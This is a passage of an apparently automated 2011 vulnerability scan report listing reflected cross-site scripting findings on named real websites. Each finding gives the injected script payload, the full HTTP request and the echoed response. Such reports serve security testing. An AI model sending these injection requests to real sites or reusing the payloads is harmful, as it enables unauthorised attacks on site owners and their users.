Host: www.kledy.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:13 GMT
Server: Apache/2.2.10 (Linux/SUSE)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=erspjnh61dnpdmlf3gifeem83vnvtfrf; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 84858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="/730b3"><script>alert(1)</script>4e79c28eac3/1/page/2">
...[SNIP]...

3.75. http://www.kledy.de/bookmarks.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kledy.de
Path:   /bookmarks.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 984ff"><script>alert(1)</script>84a31991558 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmarks.php?984ff"><script>alert(1)</script>84a31991558=1 HTTP/1.1
Host: www.kledy.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:30 GMT
Server: Apache/2.2.10 (Linux/SUSE)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=jc8bvlk4va4muta8g58r7bj557vcn5t5; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90858

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<!---->
<html dir="ltr" lang="de">
   <head>
               

    <meta name="description" content="Aktuelle Nachrichten und Videos aus Politik, Wirtschaft
...[SNIP]...
<a href="?page=2&amp;984ff"><script>alert(1)</script>84a31991558=1" class="pages">
...[SNIP]...

3.76. http://www.kledy.es/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kledy.es
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0eea"><script>alert(1)</script>28b7aad8aa4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b0eea"><script>alert(1)</script>28b7aad8aa4=1 HTTP/1.1
Host: www.kledy.es
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:19 GMT
Server: Apache/2.2.10 (Linux/SUSE)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=ua1e63t4eapvluk1tifdosn2g3btp01k; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 123923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="/b0eea"><script>alert(1)</script>28b7aad8aa4/1/page/2">
...[SNIP]...

3.77. http://www.kledy.eu/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kledy.eu
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cc87"><script>alert(1)</script>8cfab577b0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6cc87"><script>alert(1)</script>8cfab577b0c=1 HTTP/1.1
Host: www.kledy.eu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:38 GMT
Server: Apache/2.2.10 (Linux/SUSE)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=iqqau8fkjllpvbb3hqmhp602h6oqa4uo; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/6cc87"><script>alert(1)</script>8cfab577b0c/1/page/2">
...[SNIP]...

3.78. http://www.kledy.us/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kledy.us
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eefaf"><script>alert(1)</script>9a3ca53fc2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?eefaf"><script>alert(1)</script>9a3ca53fc2e=1 HTTP/1.1
Host: www.kledy.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:22 GMT
Server: Apache/2.2.10 (Linux/SUSE)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=n8tp05a1reegedblk8f7s5d21ievs6mu; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="/eefaf"><script>alert(1)</script>9a3ca53fc2e/1/page/2">
...[SNIP]...

3.79. http://www.klivio.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.klivio.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb47f"><script>alert(1)</script>7f036c475c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?cb47f"><script>alert(1)</script>7f036c475c9=1 HTTP/1.1
Host: www.klivio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:17 GMT
Server: Apache/2.2.10 (Linux/SUSE)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=85brkltkmtatmk3jhij5cc2p4k9n045i; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45640

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<!---->
<html dir="ltr" lang="de">
   <head>
<meta name="msvalidate.01" content="C0594E2AB82AE90F82DE0425FCA782B
...[SNIP]...
<a href="/cb47f"><script>alert(1)</script>7f036c475c9/1/page/2">
...[SNIP]...

3.80. http://www.linotype.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linotype.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 540e4"><script>alert(1)</script>8556a2a5bf1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?540e4"><script>alert(1)</script>8556a2a5bf1=1 HTTP/1.1
Host: www.linotype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Set-Cookie: PHPSESSID=94b0a420170f784b00641222bf549198; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 26352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="/de/?540e4"><script>alert(1)</script>8556a2a5bf1=1">
...[SNIP]...

3.81. http://www.liverpoolonlinedegrees.co.uk/2x/prequal.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.liverpoolonlinedegrees.co.uk
Path:   /2x/prequal.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1c92"><script>alert(1)</script>4e1431b8f70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2x/prequal.jsp?c1c92"><script>alert(1)</script>4e1431b8f70=1 HTTP/1.1
Host: www.liverpoolonlinedegrees.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP="ALL DSP COR CURa ADMa DEVa PSAa OUR BUS PHY ONL UNI COM NAV DEM STA PRE"
Cache-Control: public
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 28 Feb 2011 13:37:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=UZt+RC8KLuACM7wW6OWHpA**.app2-all1; Path=/
Set-Cookie: CLK=0#1298900228810; Expires=Tue, 26-Feb-2019 13:37:08 GMT; Path=/
Set-Cookie: CLK=0#1298900228810; Expires=Tue, 26-Feb-2019 13:37:08 GMT; Path=/
Content-Length: 32995

<!-- Copyright Quinstreet Inc., 2011 -->
<html>
<head>
<title> University of Liverpool</title>
<link rel="stylesheet" href="Style.css" type="text/css"/>
<script language="JavaScript" type="text/javasc
...[SNIP]...
<Input Name="LeadSiteURL" Value="http://www.liverpoolonlinedegrees.co.uk/2x/prequal.jsp?c1c92"><script>alert(1)</script>4e1431b8f70=1" Type="hidden" tabIndex="19"/>
...[SNIP]...

3.82. http://www.luxist.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.luxist.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24fbd"><script>alert(1)</script>0d4e127192f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?24fbd"><script>alert(1)</script>0d4e127192f=1 HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:07 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999991
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 62768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Luxury News from Lux
...[SNIP]...
<link rel="canonical" href="http://www.luxist.com/?24fbd"><script>alert(1)</script>0d4e127192f=1"/>
...[SNIP]...

3.83. http://www.luxist.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.luxist.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81fb1"-alert(1)-"b351e110f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?81fb1"-alert(1)-"b351e110f9=1 HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:07 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999998
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 62678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Luxury News from Lux
...[SNIP]...

s_265.channel="wb.luxist";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,luxist.com";
s_265.mmxgo = true;
s_265.prop1="Lifestyle";
s_265.prop2="Home";
s_265.prop12="http://www.luxist.com/?81fb1"-alert(1)-"b351e110f9=1";
s_265.prop16="Luxury News from Luxist - Fine Living, Dining, Apparel, Travel, Estates, Shopping";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="";
s_265.prop22=
...[SNIP]...

3.84. http://www.mapquesthelp.com/app/answers/detail/a_id/949/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mapquesthelp.com
Path:   /app/answers/detail/a_id/949/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff6c2</script><script>alert(1)</script>3cd9eba429 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/answers/detail/a_id/949/?ff6c2</script><script>alert(1)</script>3cd9eba429=1 HTTP/1.1
Host: www.mapquesthelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:20 GMT
Server: Apache
P3P: policyref="http://www.mapquesthelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUSUZCtjO5aYEsf9voh7vnDb3D3jOmdG634cg1rKT%7EfQfh9n7%7EUebI_ecEk26Xu2ju1FVahkwUfpuNBS2vDK54QctP0YQIpvV98ZndMYbvKg1KTVOrrj7FsJAWI01PjiXQAZjpe7ujAXx46zimr1NrhrdfLxRixYt5p09jjIUsIccnTRUDj3qxNbogyQPPwqjXOZo95UK07vtzKJg04mGP5ZieHt5oTmtm7sCKlc7B99%7EGwZCVx7_rOm2mQpz0sfsSsLjweweFNc9ma_QNwr_80I5F9dsTtGKXOvt5go9KPfYiTFXI3ukR_gs90rIpIwr40leQhNi6mJg%21; path=/; httponly
Content-Length: 36623
RNT-Time: D=127084 t=1298900240089142
RNT-Machine: 06
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<
...[SNIP]...
<![CDATA[ */
RightNow.Url.setParameterSegment(5);
RightNow.Url.setCurrentUrl('/app/answers/detail/a_id/949/?ff6c2</script><script>alert(1)</script>3cd9eba429=1');
RightNow.Url.setSession('L2F2LzEvdGltZS8xMjk4OTAwMjQwL3NpZC8xYTE1Q0xuaw==');
RightNow.Event.setNoSessionCookies(true);
RightNow.Interface.Constants =
{"ACTION_ADD":1,"ANY_FILTER_VALUE":"~any~","
...[SNIP]...

3.85. http://www.marque-nf.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marque-nf.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b176"><script>alert(1)</script>c9e55187d04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5b176"><script>alert(1)</script>c9e55187d04=1 HTTP/1.1
Host: www.marque-nf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Server: Microsoft-IIS/5.0
Date: Mon, 28 Feb 2011 13:37:15 GMT
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
X-Powered-By: ASP.NET
P3P: CP=CAO PSA OUR
Content-Length: 20814
Content-Type: text/html
Cache-control: private
Set-Cookie: WtID=%7BE6E05ECD%2D4695%2D41CA%2D9C30%2D9B41958F53F0%7D; expires=Thu, 09-May-2030 22:00:00 GMT; path=/


<html>
<head>
<title>Marque NF : La certification NF</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="keywords" content="marque NF, certification, cer
...[SNIP]...
<a href="/Default.asp?5b176"><script>alert(1)</script>c9e55187d04=1&lang=English">
...[SNIP]...

3.86. http://www.masstransitmag.com/online/article.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.masstransitmag.com
Path:   /online/article.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f59e7"><script>alert(1)</script>bb98f3c1921 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online/article.jsp?f59e7"><script>alert(1)</script>bb98f3c1921=1 HTTP/1.1
Host: www.masstransitmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:13 GMT
Server: Apache
Set-Cookie: JSESSIONID=E2306B625CE533A36C5496EA80CC1B52.transportation-app2; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 32816


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb='http:/
...[SNIP]...
<fb:like href="www.masstransitmag.com/online/article.jsp?f59e7"><script>alert(1)</script>bb98f3c1921=1">
...[SNIP]...

3.87. http://www.masstransitmag.com/online/article.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.masstransitmag.com
Path:   /online/article.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d27e2--><script>alert(1)</script>55b9e460f76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online/article.jsp?d27e2--><script>alert(1)</script>55b9e460f76=1 HTTP/1.1
Host: www.masstransitmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:14 GMT
Server: Apache
Set-Cookie: JSESSIONID=C4F1DA85CB37B838F1FD96BE016E085A.transportation-app2; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 32820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb='http:/
...[SNIP]...
<a href='http://twitter.com/share' rel='nofollow' class='twitter-share-button' expr:data-url='www.masstransitmag.com/online/article.jsp?d27e2--><script>alert(1)</script>55b9e460f76=1' expr:data-text='data:post.title' data-related='bloggerplugins:Tutorials and Widgets for Blogger' data-count='vertical' data-via='' data-lang='en'>
...[SNIP]...

3.88. http://www.mittelstandsblog.de/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mittelstandsblog.de
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdd56"><script>alert(1)</script>137f967236 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fdd56\\\"><script>alert(1)</script>137f967236 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?fdd56"><script>alert(1)</script>137f967236=1 HTTP/1.1
Host: www.mittelstandsblog.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
X-Pingback: http://www.mittelstandsblog.de/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org
...[SNIP]...
<a href="http://www.mittelstandsblog.de/page/2/?fdd56\\\"><script>alert(1)</script>137f967236=1" title="Seite 2">
...[SNIP]...

3.89. http://www.mydaily.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mydaily.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36161"><script>alert(1)</script>e6407427aa6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?36161"><script>alert(1)</script>e6407427aa6=1 HTTP/1.1
Host: www.mydaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:15 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999972
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 33144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="Geck
...[SNIP]...
<link rel="canonical" href="http://www.mydaily.com/?36161"><script>alert(1)</script>e6407427aa6=1" />
...[SNIP]...

3.90. http://www.netvouz.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netvouz.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3111"><script>alert(1)</script>e5d27863dc2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?e3111"><script>alert(1)</script>e5d27863dc2=1 HTTP/1.1
Host: www.netvouz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:30 GMT
Server: IBM_HTTP_Server
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR NOR UNI COM NAV"
Set-Cookie: JSESSIONID=0000X6n18LR-FJ_hyCHC4RIIGK_:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 19772


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...
<link rel="alternate" type="application/rss+xml" href="/?e3111"><script>alert(1)</script>e5d27863dc2=1&feed=rss" title="Netvouz RSS feed" />
...[SNIP]...

3.91. http://www.newzealand.com/travel/getting-to-around-nz/getting-to-nz/getting-to-nz-home.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newzealand.com
Path:   /travel/getting-to-around-nz/getting-to-nz/getting-to-nz-home.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d791'-alert(1)-'a70e5c0a27d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel/getting-to-around-nz/getting-to-nz/getting-to-nz-home.cfm?5d791'-alert(1)-'a70e5c0a27d=1 HTTP/1.1
Host: www.newzealand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 28 Feb 2011 13:37:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: AKAMAI_LANG=us; expires=Sun, 29-May-2011 13:37:55 GMT; path=/; domain=.newzealand.com
Set-Cookie: DISPLAY_LANG=en; expires=Sun, 29-May-2011 13:37:55 GMT; path=/; domain=.newzealand.com
Content-Length: 110808

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><title>Getting to New Zealand > New Zealand</title><meta name="descri
...[SNIP]...
the language subdirectory with market code for Akamai to switch cookies//Currently only applies to English markets...thisURL = available_lang[availlanglist][1].replace("/en/","/"+thismarket+"/") + '?5d791'-alert(1)-'a70e5c0a27d=1'//Check if current url contains a market 'root' //and if so disable all other market urls//as Akamai would have forced the market cookie    isMarketURL = false;for (altmarketlist=0; altmarketlist<
...[SNIP]...

3.92. http://www.newzealand.com/travel/getting-to-around-nz/getting-to-nz/getting-to-nz-home.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newzealand.com
Path:   /travel/getting-to-around-nz/getting-to-nz/getting-to-nz-home.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16db5"><script>alert(1)</script>4d3d7ecd725 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel/getting-to-around-nz/getting-to-nz/getting-to-nz-home.cfm?16db5"><script>alert(1)</script>4d3d7ecd725=1 HTTP/1.1
Host: www.newzealand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
